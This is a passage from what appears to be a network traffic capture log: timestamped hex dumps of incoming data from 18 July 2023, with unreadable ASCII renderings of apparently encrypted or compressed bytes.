4c 66 ea 82 a3 b7 ab b4 8c dc b4 87 1a 7c 41 f7 bd a3 de a4 9e e0 2c 90 34 56 3c 24 9f 99 c5 01 34 d6 71 de 2f b2 a0 04 4e 73 ad 2c 0f c1 ce be ca 21 6d 56 e3 b0 a3 1b a9 a5
                                                                                                                                  Data Ascii: 8&d*Ucr/nNtD,/2Vz;6zQI 82g>_}~{6&HDqxvB|#F?cKKEeq]x<rhG'&)<Lf|A,4V<$4q/Ns,!mV
                                                                                                                                  2023-07-18 15:37:06 UTC464INData Raw: 62 73 7a 67 c4 39 14 9d 2f 07 9a 7c a1 61 7a 76 58 5c d1 da 1e de fd 1d c3 cd f3 f7 55 6a bb 74 55 f5 d9 fa 25 d5 f5 5c eb 5c c4 b3 cf d8 95 ae 49 ac 36 72 cd de b1 5b 31 73 ec cc a3 f4 87 97 95 d3 cd 23 e4 9d 66 58 26 41 6b ed 16 e6 41 df 95 00 63 c9 da ed eb d5 94 43 7a 01 b0 8e 5e 8e bd 48 d6 01 9c 10 77 60 cf 96 c0 d6 25 41 34 18 e8 19 32 1c 22 60 ac f5 92 62 02 22 4f 5c cc ac fc 2a 1b c5 e4 c3 86 b2 b9 c6 57 4a e0 da b2 55 0b 50 cc 3b d4 e5 28 9e 07 84 3c 89 83 92 91 c9 27 83 af 08 16 0a ae 45 c0 89 72 3a 2d 34 80 e5 d3 e5 2a 0c b5 85 17 89 26 ac 44 6a 87 62 be 2e ab 82 5e 1a 51 b8 be e0 fe 22 8a d7 8b c2 0e 05 25 c8 04 24 09 08 32 c6 6b 75 d0 b4 c3 8f 1b a2 f1 f1 c8 30 73 8e 0c 65 b2 1f 10 ab 57 ed 8a d0 eb 8c 3b 06 29 c7 14 75 d6 51 4f 4f 7c 16 99
                                                                                                                                  Data Ascii: bszg9/|azvX\UjtU%\\I6r[1s#fX&AkAcCz^Hw`%A42"`b"O\*WJUP;(<'Er:-4*&Djb.^Q"%$2ku0seW;)uQOO|
                                                                                                                                  2023-07-18 15:37:06 UTC480INData Raw: 75 fd 87 c2 22 40 03 86 f3 f1 3b a6 f7 dc 00 bd 5c d3 01 ea 14 65 fd c1 bb 89 d0 a5 6c cd da 3f 9f 55 0a 08 5f 28 e5 8f 6c f7 ea 7d 4e 80 75 dd 2d fb 5e 5f 0c eb 46 1d a7 5b be ae cd e1 d6 25 46 72 66 e8 0a 20 42 18 a3 90 91 3c 6a 15 bd f3 e5 e8 7b 14 c1 3e 60 2b 5d 20 4d 4c 75 a2 3b 53 e4 aa 86 39 b8 fd 40 32 06 a4 37 9d c1 ef 43 1e 7f 83 7a cc 03 8e 7c 1a da a2 fd 90 99 dc e8 b8 9b 6c b5 13 df 79 a3 a4 9d 52 24 78 62 02 d6 1e 5f bc 5d b1 bb 20 70 36 e0 0b 67 1b 36 03 8c 38 e9 c8 c7 0b 3d ec f1 2e 86 ae c9 82 73 d5 85 ce 19 3f 38 cc 27 95 e6 ad f5 03 e8 1c 10 4a 8c 64 f3 2e 63 c3 9a 94 b3 67 e5 ac 1a e0 f2 23 6e 8a f4 ea 6a ed 82 56 a8 d8 ed b9 7c 3a 10 3b 3d 0b b5 15 cc 91 ab 14 c7 41 b5 19 37 15 ce 62 ff 51 43 eb 23 d1 4e bb 0d 83 c8 34 56 bc 6f 80 fb
                                                                                                                                  Data Ascii: u"@;\el?U_(l}Nu-^_F[%Frf B<j{>`+] MLu;S9@27Cz|lyR$xb_] p6g68=.s?8'Jd.cg#njV|:;=A7bQC#N4Vo
                                                                                                                                  2023-07-18 15:37:06 UTC496INData Raw: 0c fb cd 39 dd fc 50 a8 21 5d 16 ad 14 a2 3c c9 05 53 de 48 17 17 cd 03 d0 57 71 13 62 56 2a 15 42 3a d9 39 46 1a b1 9e 5a d9 17 c8 b3 9f f7 18 79 d6 0d 1f cb 4c 36 86 48 5b d2 8f a2 10 74 75 6f f3 02 2d ed 04 7d 26 16 38 14 8b 74 b2 83 03 ad d6 53 09 5b 0d b5 fd c1 e4 be 8b e2 d5 d9 19 6f c6 75 71 8a b2 b0 74 60 1f bf 75 3e 4e 37 8a 69 80 ce d5 cd 61 55 fa 39 33 f0 ad 6f 94 98 9c 39 26 4b 9b 07 4e dd e4 4e 11 1a f8 44 c4 72 3b 01 9a ac 18 b0 7f 78 99 15 6e 0c d6 75 81 fb fb c1 26 68 c9 81 27 cc 69 9d c9 df cb c7 30 f4 43 95 78 ef bd 97 9c a5 bd 5b da c7 13 27 68 87 13 5d 35 2e 5e af ee 6d 42 0e c3 5d b7 2c 96 83 c5 37 19 f2 77 af 89 5d ae 7b 86 4c af 35 72 9d 79 d9 02 fe 62 40 55 79 0c 4e be 0c 74 29 73 87 98 b4 1d a7 3b 16 86 65 87 35 77 0e f9 e7 05 c7
                                                                                                                                  Data Ascii: 9P!]<SHWqbV*B:9FZyL6H[tuo-}&8tS[ouqt`u>N7iaU93o9&KNNDr;xnu&h'i0Cx['h]5.^mB],7w]{L5ryb@UyNt)s;e5w
                                                                                                                                  2023-07-18 15:37:06 UTC512INData Raw: 0e d3 d7 51 39 f9 43 38 fa 08 81 9d ff 95 2a 3f 3c 0c 75 36 63 23 59 0f 60 4e 65 40 9c 5a 0e b0 96 89 c1 c5 87 cb 66 04 48 11 8a b3 18 c3 e9 91 da 85 96 ab f0 e8 72 9e 3b 62 9a 8b 2d c2 f6 4a 31 23 c5 b1 c7 e7 d6 ae 16 30 aa d5 e2 9e a5 90 d8 7a f1 be 67 21 96 c8 b4 b0 d4 48 15 20 07 02 02 9f f5 00 2c 0e 2f 02 0e 91 d5 57 38 05 5b f2 d8 25 45 46 38 30 89 95 01 6b c5 f5 7c 94 26 d0 3c 38 bc 91 ca 74 40 cc 5f eb 34 c4 c6 b1 86 a2 58 27 8f b6 17 51 9d a9 b2 94 de 17 1b 6a f9 41 4f 1b 27 b9 b7 0c 59 9a ee 87 9d dc 4d c3 bf 24 c1 86 ac cd 8a 35 7d 67 ce f9 c7 0b 3f c8 43 47 2f 45 7a b9 31 eb 9a e0 f6 a4 c3 b2 88 e5 0f e6 42 fc ff f8 84 2b 33 fb d4 9f 17 d0 db a1 ea 28 ba 07 cf 88 15 78 d3 58 25 17 2b f1 d7 92 97 5f 66 7f 27 9d 51 d9 97 02 6f 8a cb ef d0 1e 0c
                                                                                                                                  Data Ascii: Q9C8*?<u6c#Y`Ne@ZfHr;b-J1#0zg!H ,/W8[%EF80k|&<8t@_4X'QjAO'YM$5}g?CG/Ez1B+3(xX%+_f'Qo
                                                                                                                                  2023-07-18 15:37:06 UTC528INData Raw: 2e c1 ae 62 2d 5a 32 31 52 4b 63 4f c8 89 cc ae d0 a8 8a 10 1f 6e f1 e7 c2 f1 7d 46 da 3b b3 4e 24 f7 f0 15 3a ba cd be d8 40 23 fc 6e 42 bf 8a 72 5c 17 e4 d8 ba e5 cf 3b 93 ea 8d ad 30 7d b8 b4 45 51 07 f9 b0 ac 25 2a 86 3e d8 4c 79 9c 1f eb 9e c4 d2 0e 2b 20 28 40 f6 be 47 c0 1a 9e 93 7c 53 ae 23 7f 0b 70 a3 a1 df 97 42 30 e4 a6 bd 69 bc 88 2f dd 19 2d fa 64 13 bb 42 2f fb d4 5d 55 17 a2 90 6f c1 93 7d b8 c6 03 ab 6d 53 12 bd 85 51 0d 25 24 73 c0 8a 37 52 89 39 c7 47 be c8 4f 68 c0 4f d2 d0 a7 d8 fb b0 a0 50 3b 31 e2 f3 f8 64 cd 51 ab b1 40 35 17 9d b2 9d 30 a4 84 4e 84 ba fb 78 6b ef 55 df c0 7e c9 7d 95 53 86 04 6a 06 d1 c0 a4 dd bd fe 3d 37 bb 2e 07 43 78 58 73 a9 0c 81 66 c3 fb 0c 63 e6 98 ce 2c 16 cd 6c b8 e4 fc 50 8c d1 c1 29 f6 6c 5f 21 90 65 bf
                                                                                                                                  Data Ascii: .b-Z21RKcOn}F;N$:@#nBr\;0}EQ%*>Ly+ (@G|S#pB0i/-dB/]Uo}mSQ%$s7R9GOhOP;1dQ@50NxkU~}Sj=7.CxXsfc,lP)l_!e
                                                                                                                                  2023-07-18 15:37:06 UTC544INData Raw: b1 09 bf b6 cf d6 2a 6c dd 3a 3c 5a 74 bf 82 32 18 1a b3 ed f5 05 1e 76 3d ca 7c 2e 99 00 6a ef 42 3f 6a 84 80 d9 a0 63 23 18 ae f0 f0 3f 50 e5 6f 57 6c 49 1e 14 83 bc 3d ec 56 c6 e5 33 91 9e 02 3f af 5b 76 05 42 15 fc 82 95 a1 ae 18 3a be 2b 10 9b cd bd 56 10 38 5e b6 3d b5 b9 70 a7 44 1d 9e c0 fe 91 54 3a 67 91 99 7a 3e c2 61 e4 4a d7 d0 a5 2a d6 a3 bf 6e c1 f8 01 e3 4f 14 f0 08 e5 a2 00 f0 ac 55 a2 e1 40 b3 99 c4 cd aa 04 1f ba 11 da 9d d0 02 d5 13 2e 26 19 8a 12 88 46 01 13 1d fc 4f 4d 1b 3c e9 b9 d2 be b5 d5 b8 1b 7f cb f2 b9 45 24 ab f1 ac 6a 86 41 f4 c6 ba 8b 4a 59 e6 92 aa fe 63 61 35 38 5d 82 11 3c 8b 20 5c a0 3e 90 9f 1f e9 c7 c8 7e a9 71 6b 96 39 2c 3c ba 2c cf 9b d6 f8 bd 06 c6 e7 8e 4c 22 fe 93 44 57 8e 82 46 59 36 ac 43 13 78 b4 7c 47 77 ef
                                                                                                                                  Data Ascii: *l:<Zt2v=|.jB?jc#?PoWlI=V3?[vB:+V8^=pDT:gz>aJ*nOU@.&FOM<E$jAJYca58]< \>~qk9,<,L"DWFY6Cx|Gw
                                                                                                                                  2023-07-18 15:37:06 UTC560INData Raw: fc 0b 66 77 14 99 e9 ef a4 42 65 f3 c9 57 cb 5d 57 ac 0b 89 31 fa d3 0a b6 dd 0b 76 18 47 fb 7d 6f 93 1e ef 5e e7 e2 9b 88 4e e3 eb ba ce 94 32 38 4a b1 71 11 cf cf b4 96 f4 33 20 4c e4 fd 7e 4b a5 07 61 4d 5d 42 5d 05 28 36 d2 94 6e 4a 3c df 83 af 6f ab 1d 02 08 25 97 bf 6c a0 b3 20 a2 ef 01 50 46 b3 5a 1e 1b 96 09 85 7e 32 68 65 25 67 a6 2f d7 c6 00 0d 4f 19 ba be ae 48 43 5b 60 33 ad 6b 9a b2 0c 4b f5 39 53 99 fe 13 0c 3c e9 a4 cd a1 89 84 98 22 c3 f2 79 f4 01 07 5b f3 7b a5 24 34 5a da 45 a0 09 0e 74 b2 77 c4 24 78 fc 41 09 07 63 7e e8 1b 42 e7 60 cf 72 e4 ba 9e d4 16 30 57 f1 ac bf 40 9d f1 38 0c a9 4a 98 a1 67 18 1d d8 8c ee e6 68 7f fd db db d1 e4 6b 15 95 28 19 d0 fc 64 10 99 02 8a 6d 86 5b b3 31 69 57 d7 66 a1 df ca 9d 35 4b a6 6c c9 29 d2 c1 12
                                                                                                                                  Data Ascii: fwBeW]W1vG}o^N28Jq3 L~KaM]B](6nJ<o%l PFZ~2he%g/OHC[`3kK9S<"y[{$4ZEtw$xAc~B`r0W@8Jghk(dm[1iWf5Kl)
                                                                                                                                  2023-07-18 15:37:06 UTC576INData Raw: d1 b9 59 0e 86 9c be 80 18 cf 46 cb 2e cc e6 ba 2f 9c 68 d7 1c 47 60 b5 e1 3b 22 41 80 49 18 b3 0d 3b ae f7 9a f4 ad 3e b3 71 8a 37 d3 7e 5e c2 0a 26 fd 7a bd 87 d2 e7 9b 63 84 9b 5f 8b 1e 5c 43 ff 6c 63 ee d9 54 62 b4 61 9d 13 1c 9b 7b 85 ad 6e 83 53 5c 83 e8 cb 6f 89 fb 37 f3 f5 78 d9 04 b1 07 07 f7 67 8c a3 f3 b6 bc c3 51 6e c9 89 78 ea 66 22 85 e8 8f de 0a 3a 3b 8a 99 0d 78 3c 7c 00 d3 1e 4e c4 cb 44 f6 d6 c6 24 1e bc 76 e6 b1 91 94 9d 3f 3c 7a b2 57 b9 22 07 2a b1 24 b6 69 fc c2 8f 22 6a bd a2 ea f9 1f 8b f5 f5 da 2c 33 32 b0 d7 be 0a 9e e5 a3 07 76 46 b4 f2 03 af 3e c6 8c 24 c4 44 88 1a 6a 47 10 20 7c 69 f2 c4 c5 00 e7 48 c8 f7 ca f0 6e 60 67 b4 d2 88 f1 37 6a e5 e0 63 6a eb 71 58 fb be 05 ee 19 d0 00 48 e4 88 c8 c4 11 e8 3f 9a 23 cf dc 75 28 56 4a
                                                                                                                                  Data Ascii: YF./hG`;"AI;>q7~^&zc_\ClcTba{nS\o7xgQnxf":;x<|ND$v?<zW"*$i"j,32vF>$DjG |iHn`g7jcjqXH?#u(VJ
                                                                                                                                  2023-07-18 15:37:06 UTC592INData Raw: 59 f7 72 c7 c7 1c c7 47 76 7f f6 f7 cb 28 6a 48 c1 d7 18 45 c7 cc 48 8e 4b 12 04 c0 14 14 70 1c 44 f0 7d 37 6a 7b 05 01 ba b2 33 66 b6 d3 db c1 80 96 31 0f 1b 22 f0 04 bb 2f 5c 29 62 62 f5 45 20 6c 5b 49 79 95 c4 df e0 5a 80 ae 3f 67 b9 62 05 e9 31 f0 a8 d7 2b 2d 16 b9 8c d9 f7 18 0b 99 c4 bb 98 23 84 e8 72 73 00 96 ec c8 19 02 65 a7 c7 5b 32 13 7f ce ee c5 c5 bd 7f f9 8f 35 83 9a a1 49 5c d5 12 eb c1 7c 32 44 b2 7c 13 ed a6 e0 23 2f 7f 5a 58 d4 ad 2e 72 f3 12 a6 48 a1 4d 0d 22 1e 45 21 f2 0e 73 5f f3 f5 47 ae 97 24 71 74 c9 2d 4d d4 62 34 fc 12 7f bf b2 8d 83 bd f6 03 03 a9 0d 79 10 b9 bc 9a 90 ba 5c b4 73 c5 1b 82 2a 81 7a a7 dd 44 c3 72 34 15 c0 4d 77 28 4e ff 1c 7f 64 47 52 ed af b0 cd f6 7a 25 2f 49 6a 12 f6 1f cb ff 00 6b d5 f2 26 b9 c8 8d c1 91 66
                                                                                                                                  Data Ascii: YrGv(jHEHKpD}7j{3f1"/\)bbE l[IyZ?gb1+-#rse[25I\|2D|#/ZX.rHM"E!s_G$qt-Mb4y\s*zDr4Mw(NdGRz%/Ijk&f
                                                                                                                                  2023-07-18 15:37:06 UTC608INData Raw: 35 0b 32 18 87 ca 87 c6 e0 a3 fb 03 79 ad e5 f7 b4 ab ad 23 05 39 e9 03 2c 34 e5 68 be 68 c1 59 e9 60 28 26 be 9e ce 84 c1 3d 2b 8a 12 aa 24 1c 3f 97 92 99 d3 49 91 e0 61 cb 94 22 af af 72 ee fe 3c 7d 5f d2 52 ca ba 84 15 26 6e 85 2f ec bc 10 b6 f0 04 bf 2b d7 97 a5 b0 00 5a 0f b9 0a 3f 74 40 09 16 ae f8 9f 43 d4 51 92 07 12 19 55 5b ec 19 cd 28 61 11 90 c4 a9 6f 4e a6 b5 50 3c e4 88 5d a7 cb c1 52 29 55 df 58 af e2 a6 67 b7 fc 7e 5d 54 83 76 cf 4d 0e da de 59 85 85 c6 5d 0b e1 69 eb a8 cd 48 0c d6 01 09 de 41 9d 11 80 1f a3 c4 1c 06 b2 29 57 c1 ba 71 ed e7 32 b8 c8 0f a8 29 23 f8 83 ca f0 85 b3 23 17 19 08 f8 5b 3f a5 74 5e 57 91 3e 32 89 24 04 ba db b8 00 45 38 ac d4 8c f5 b6 b8 bb 04 6d 2f ea da 56 54 e6 b1 9b b2 8c 72 95 a0 d2 76 3a 7a 32 90 05 e8 da
                                                                                                                                  Data Ascii: 52y#9,4hhY`(&=+$?Ia"r<}_R&n/+Z?t@CQU[(aoNP<]R)UXg~]TvMY]iHA)Wq2)##[?t^W>2$E8m/VTrv:z2
                                                                                                                                  2023-07-18 15:37:06 UTC624INData Raw: 40 5c ca 26 a9 f6 01 5f ef 6e 9c c4 37 39 9d 25 e8 a7 58 58 47 3c d1 1c 9d 51 93 bf f1 f5 ce cf 62 67 0e d5 0a 62 0b a4 4f b4 53 b9 b1 65 53 2f 8a 05 77 aa ec 86 44 9f 1c 4a ef 66 c1 4d 6c df d1 d0 b6 47 11 bf ac 54 5e 61 10 11 b0 22 a0 4c 27 be 16 40 ed a7 da d2 b9 74 9c fc 29 6b 10 35 ce 8e 48 a2 a2 1b 72 67 fe 7a c9 d3 4a 1b b4 50 bb c5 f7 5b 05 a0 b7 5d 5a ee fe 04 80 c2 51 02 3d 0d 8e 7b dc 41 94 bf 92 f0 e8 8e e5 39 e1 88 a1 73 85 44 1e e4 8f f9 e7 e2 2d fe 6e d0 ca d7 b6 73 de 2d 46 e6 10 ed e9 5e d4 f8 38 26 65 12 c1 a1 d8 62 8f e8 73 b5 21 f6 a2 d5 74 2f 27 3c 89 89 e5 d5 b3 54 ec cb 16 96 80 13 31 68 35 0c 8a df fa 7f c8 9c 23 38 06 2e ae 0b 93 02 93 3f f2 a2 d1 44 04 13 4a 42 32 75 f5 45 4e c5 4b f2 36 6e ca 1c f4 13 21 8b 78 9a dd 07 49 ce 9b
                                                                                                                                  Data Ascii: @\&_n79%XXG<QbgbOSeS/wDJfMlGT^a"L'@t)k5HrgzJP[]ZQ={A9sD-ns-F^8&ebs!t/'<T1h5#8.?DJB2uENK6n!xI
                                                                                                                                  2023-07-18 15:37:06 UTC640INData Raw: 74 e7 4b d9 19 77 64 56 c3 83 f3 f7 e9 45 8e 79 9e 16 85 f5 32 97 90 27 ac 52 82 73 0a a2 07 77 f9 75 f6 cc 90 70 3b 2c 4e 0c 22 46 25 be 10 a3 45 cb 04 4d 29 d0 b4 0a 7a 1b 6b 0e 50 8f b6 11 24 08 72 b2 2b ee b2 72 c2 f6 bd 65 f9 d2 c0 e8 5d 08 6d d6 bb 19 c4 0b 0d ea 9b 8c e6 cc e2 08 e9 8f 06 2e 67 cc 30 43 76 bb f5 dc cd 77 c7 a0 20 9c 51 5d 63 40 d1 de f8 8a 20 8e 53 29 7e c3 cd 81 27 6c e1 2d d9 2c 97 66 b7 f1 fc 9d d2 38 d1 40 70 f6 fc 5f 18 cf 5d bd 74 54 aa f1 0e 06 4d c4 ed f5 0a 62 0e a0 11 62 90 e8 7c 32 49 71 c8 33 f1 2f 36 e8 f7 5d f3 ec 44 26 dd 0d 28 a5 5c ae 7d d3 a1 fa b0 61 fd 93 8d 6c aa 8e ea 9e 31 6d e9 00 c9 8f b0 5d 92 25 92 74 38 c9 af 92 6d fd e0 62 31 5d 18 49 8e 1b 4f 94 3e ac 31 4e 70 55 95 58 6d 58 35 c7 d8 98 cd 0b 29 e4 87
                                                                                                                                  Data Ascii: tKwdVEy2'Rswup;,N"F%EM)zkP$r+re]m.g0Cvw Q]c@ S)~'l-,f8@p_]tTMbb|2Iq3/6]D&(\}al1m]%t8mb1]IO>1NpUXmX5)
                                                                                                                                  2023-07-18 15:37:06 UTC656INData Raw: b3 5d 36 79 ee a1 00 62 08 3b f7 6a 6e 43 8f b1 bf 15 36 1b 6f a0 43 af 95 43 80 97 8c d5 27 7d 11 0b 56 02 90 59 2c 56 58 89 e0 1a a7 67 f0 d8 2d af f9 c6 cb 08 fc e0 8b ff e7 9d 98 59 5b c3 24 0b e8 c1 9a c6 38 5c 30 d3 4e 72 85 2c 80 85 1e f9 d5 eb 27 a1 13 ba 8b f1 e5 1c 4f 7a b3 2a 54 64 d1 dc 0a 47 f7 2d 85 a9 e9 fe fd 8f ad 71 bd 3a ac 06 e6 e9 fb 69 4c 3e db 68 ed a1 83 9c 15 5c c8 3a 43 fe d1 a8 61 a1 3f a2 cd 95 38 73 9c f9 92 a3 9e fd 70 64 ba 71 65 a9 0c 9b 50 96 4e 60 a6 f2 aa cd d6 6b b2 03 75 58 9d d1 aa 1b d0 c0 01 51 43 32 5a 91 14 74 57 81 57 73 e7 64 4a aa 63 8b fe d4 4c a7 48 bc fb 5e c4 52 bd 1f 33 2c d5 91 91 03 1e 46 bb c7 e4 f5 b0 4f fb 37 9b 2a b1 23 f5 cb ce 1f 8c d0 1c 1d eb 53 f1 e7 d1 f3 69 74 f7 08 cc d8 0c 08 7e b3 c1 25 4d
                                                                                                                                  Data Ascii: ]6yb;jnC6oCC'}VY,VXg-Y[$8\0Nr,'Oz*TdG-q:iL>h\:Ca?8spdqePN`kuXQC2ZtWWsdJcLH^R3,FO7*#Sit~%M
                                                                                                                                  2023-07-18 15:37:06 UTC672INData Raw: 39 04 f8 96 29 c7 3a f3 1b 41 21 75 eb f0 38 c7 ab af 3b 27 aa 59 17 e4 24 91 0f 4b 1f ac db d7 a6 55 31 56 1b 5e 4c 82 89 df 47 b5 c8 ed 6c ad 1d bb ed 49 3b 8e 99 af 7d ca b7 02 45 4d 6d 20 3e ec 76 8a a0 0d 74 f6 d7 60 35 9d 77 ec 38 75 ed 40 3a 10 a5 f0 22 14 3e 78 3d 42 e8 1f 0b 22 ea a2 9b 9f 40 80 90 50 43 29 c6 ad 63 a1 11 13 df 28 61 2b 45 8d cc 6f 07 78 06 f9 17 83 d7 1b 36 b1 0a 60 dd 57 44 30 2e 9c 73 34 c9 59 d4 92 1f ad 99 e3 64 04 b3 e2 63 4d ab 49 b1 78 55 91 98 87 87 6f 2a ca 74 34 f9 b9 cf 61 d9 36 5d e1 a4 51 a2 15 b7 3d fe 81 ac ab c6 7d 52 0f 66 ba 4c e1 98 fc d3 c0 6d 25 f1 ab cb 19 a3 9b 8e 27 59 82 14 c1 ad 33 92 8e 92 0d c0 f9 e9 91 a5 dd 6d a1 12 c8 44 e1 d4 a2 92 c6 e4 63 7b bf e6 38 9f e7 ce b7 99 7c a0 9a 82 03 18 e7 b6 0e 55
                                                                                                                                  Data Ascii: 9):A!u8;'Y$KU1V^LGlI;}EMm >vt`5w8u@:">x=B"@PC)c(a+Eox6`WD0.s4YdcMIxUo*t4a6]Q=}RfLm%'Y3mDc{8|U
                                                                                                                                  2023-07-18 15:37:06 UTC688INData Raw: be b4 9b 87 48 39 e8 5e 27 2f 3f 5b 4b 3d 98 9d 6f 96 cc 81 98 86 7e 14 6e 8c 01 db cb 47 d4 7c ee 7a 19 23 02 71 4f dc 76 aa b8 56 e4 5d ce db 87 67 c5 64 70 21 89 58 c5 cf 4e ff 26 bf 09 9e 23 de 9e 7c 91 0a dc af f9 ce 74 e5 76 e6 e8 88 85 93 6e ad 06 23 2d 41 88 9b 9d 6d 6d 26 29 18 f3 01 12 a1 66 b5 3a 31 e2 38 00 01 f3 16 20 de d5 74 2a a9 92 89 f7 a0 16 9d 15 fd fc 11 3a 9f ef 48 cf 53 9c 1b fc 20 5d 62 7d da b0 e6 4f 32 d7 07 0e 8f 62 f3 e9 0b 6f 19 df 87 40 44 57 e1 87 52 ab 85 c0 cd 43 75 cf 7a f5 ab ab 71 d6 be bf a5 b0 03 ee 18 1e 3f af d1 f5 10 f1 20 ad 79 81 d3 7b 6c 02 b4 27 79 3f 7a 08 b3 e8 f3 8d 25 5b cc af 77 44 85 11 f7 e4 72 be 2b 3e db 20 8b 71 47 5b ec c9 b7 89 52 f1 d4 0a e3 ec 88 a6 6f a6 eb f5 95 09 2d da a6 85 1f 93 a8 08 47 9b
                                                                                                                                  Data Ascii: H9^'/?[K=o~nG|z#qOvV]gdp!XN&#|tvn#-Amm&)f:18 t*:HS ]b}O2bo@DWRCuzq? y{l'y?z%[wDr+> qG[Ro-G
                                                                                                                                  2023-07-18 15:37:06 UTC704INData Raw: cc 80 06 5f ba 3d 19 43 fa 85 bc b8 7f 92 d6 f7 5a 65 3d ca f4 47 f8 b2 0b 57 6d b5 0d d4 bd 2f d2 53 7e 13 f3 0e 3b 38 fb 72 5e 27 76 ef 7d ac d6 87 de 4d 2d 81 4d d5 ff 19 bc 6a 5d 0d bf 47 e8 13 3e 79 ab 17 76 1b 6c 16 a3 51 0f d6 27 20 2b 42 7a 5f 1f cd 7b c8 57 d0 ba 44 d7 d2 27 12 ca da 23 f8 82 06 c9 95 58 48 39 18 fa f8 1d a2 75 10 30 d6 2d 02 ae 91 a3 9d ec f5 fd 11 5b 02 b3 32 91 eb 1f 2d 59 d7 31 1a 4b 88 4c 0e 13 bd 9c a8 2f e6 10 76 ba 52 cb 14 fb ec de 01 6d 62 90 8e 1e 77 7f c2 93 da f6 a7 be 6e 5f dd ee 8c 61 b5 8f b3 8d 53 22 c8 49 18 b1 f5 84 9f ff ba a6 bb e3 b2 d8 7c 6b ce b0 47 41 5a 6e 71 e4 fd ea 0a 07 90 41 aa 3f 37 37 1f 87 8c a3 9d 75 b7 64 fc 38 2e 0a 47 b9 b6 12 bc 64 7e fc ba c1 31 0c 2c bf 0b 87 dc 29 56 4b cd fb 47 e0 3c 77
                                                                                                                                  Data Ascii: _=CZe=GWm/S~;8r^'v}M-Mj]G>yvlQ' +Bz_{WD'#XH9u0-[2-Y1KL/vRmbwn_aS"I|kGAZnqA?77ud8.Gd~1,)VKG<w
                                                                                                                                  2023-07-18 15:37:06 UTC720INData Raw: 57 fc 57 9d 7e 5e 5c de b4 05 a0 a6 2a 48 1a 2c 31 e4 09 b9 da 17 ed 38 d5 53 e9 2b a8 45 3c 80 d0 01 83 57 ac 5a 42 62 c9 90 5c f6 23 ee e0 10 08 02 06 12 bb f3 a6 e1 4f 2a 22 f5 4f 3c d0 5a b9 5f 0a 3e 53 02 7c 06 8b e2 bf 96 c5 41 ba 23 a6 a7 9f 6a 57 83 c6 24 2e 70 68 34 0b c6 c6 b9 f7 8b d2 bd 9a 70 e8 99 a5 7c dd 6d 53 b9 7a f1 3c f9 af e1 b2 9d 18 65 6e d3 cc 89 e3 f9 fb 41 50 aa 2c 15 c5 c0 52 57 56 8f dd d5 d8 a0 62 a3 1e 9b 84 6c 52 d1 05 dc 21 fb c2 99 1a bc 3e 75 36 e6 80 b3 9e 98 c1 10 32 8d e0 94 0b 0a 9f 85 ff 21 b8 b2 59 9f 24 99 61 8d db 1c a3 93 12 81 14 3e 06 9d 57 a0 81 a0 eb 07 f1 c5 fe 4b 2b c9 9f 14 2a a4 80 b9 04 92 62 49 fd 8f 68 ad 50 c4 66 8b 7a 77 bc 42 90 1f c4 f1 61 75 ae e4 63 86 d4 bc 4b 63 44 3f d1 a3 b5 02 f5 23 95 b9 6c
                                                                                                                                  Data Ascii: WW~^\*H,18S+E<WZBb\#O*"O<Z_>S|A#jW$.ph4p|mSz<enAP,RWVblR!>u62!Y$a>WK+*bIhPfzwBaucKcD?#l
                                                                                                                                  2023-07-18 15:37:06 UTC736INData Raw: 6b 09 67 3c 50 f9 8b f8 24 f7 b1 af da d0 db 76 df 41 2c 26 ad 34 e3 a6 9f 4a e8 46 09 7c 09 df 04 d1 c3 90 21 7e b6 d8 16 2c 8c 36 a9 34 a4 24 1b 3c 77 56 5c 61 1e 07 c7 25 fd f8 a0 9e c7 51 f3 90 75 11 3d 1f e9 66 af 78 c6 54 f2 00 14 69 d8 f9 da b0 fd fb 84 dc a9 c2 3f 20 42 68 58 99 d2 3d 33 cf fe b8 4d ed 7c 3a 0c 0f 8d 73 dc 44 c6 b5 f7 3f c4 8b b1 d6 a3 60 1c 33 b7 b0 0b 24 b9 3d 53 1b 3f 26 ee ec f6 90 86 74 f5 7d 9d 84 b6 18 2d 21 ab 0f 73 ab c9 1e 83 9e 01 8e be b0 14 1c 04 74 9a 78 bb e7 1b 4f 9e e5 2c 36 65 37 c3 59 2f 44 c0 cb 5c 05 b3 7d 28 36 79 c1 7f dc 82 d7 83 47 9d b5 6b 3f 26 22 e6 b5 04 d0 a5 5c 05 d4 3e 90 39 1f 2f bc 5c 7e 8a 3b e5 67 1e 67 92 b8 a8 d1 98 09 6c dd a1 8b c0 d9 a3 57 32 88 0c f9 9a 68 24 26 eb ca 95 a4 a8 9d 29 1b 81
                                                                                                                                  Data Ascii: kg<P$vA,&4JF|!~,64$<wV\a%Qu=fxTi? BhX=3M|:sD?`3$=S?&t}-!stxO,6e7Y/D\}(6yGk?&"\>9/\~;gglW2h$&)
                                                                                                                                  2023-07-18 15:37:06 UTC752INData Raw: 9e 1f d8 3e be 79 00 f4 d1 47 45 0e 96 35 ff 7c 19 4e dd ce 5b 2c b2 3e 64 f9 17 67 f2 39 76 d1 1b 7f e7 1e a2 72 16 62 84 6b 0c 6b 3b 4a 9b 12 ec f7 9e ff 4e 22 fb aa 76 8a 7a e0 11 d8 fe 46 40 79 79 9b 77 d7 80 f2 f5 d0 c2 a6 ac c7 3b 49 80 86 2b b5 3e 11 78 d6 a9 14 49 f5 74 9f 4b c8 4a b6 5c f6 28 5f 01 8b 83 a2 93 92 92 0a 24 8a c6 70 1c fd cc 29 1c aa f7 56 9a b4 8d 04 ac cf d5 f2 69 6f c3 d6 bb 28 70 31 58 fb 50 1c 6c 96 79 1e c0 56 04 33 c6 d5 b7 6d 8a fa 9d eb a6 bf 5a 13 c8 d2 66 95 52 f9 d6 a6 7a 72 55 7d 46 c6 08 08 81 01 8b 8b 98 65 c9 de ce 3f 04 cc da 8f 8d 05 0e 4a 6e 44 46 9b a8 38 1f 0e 66 d2 ee 26 99 ad d5 ea 51 a1 e1 7f 39 6b 9b 9b 03 65 fb 20 8e ce 97 6a 19 da 5b 83 52 d4 ae f5 5a 10 24 ba aa 57 28 1e 30 83 f1 71 0a 0a 51 a7 8a 39 0b
                                                                                                                                  Data Ascii: >yGE5|N[,>dg9vrbkk;JN"vzF@yyw;I+>xItKJ\(_$p)Vio(p1XPlyV3mZfRzrU}Fe?JnDF8f&Q9ke j[RZ$W(0qQ9
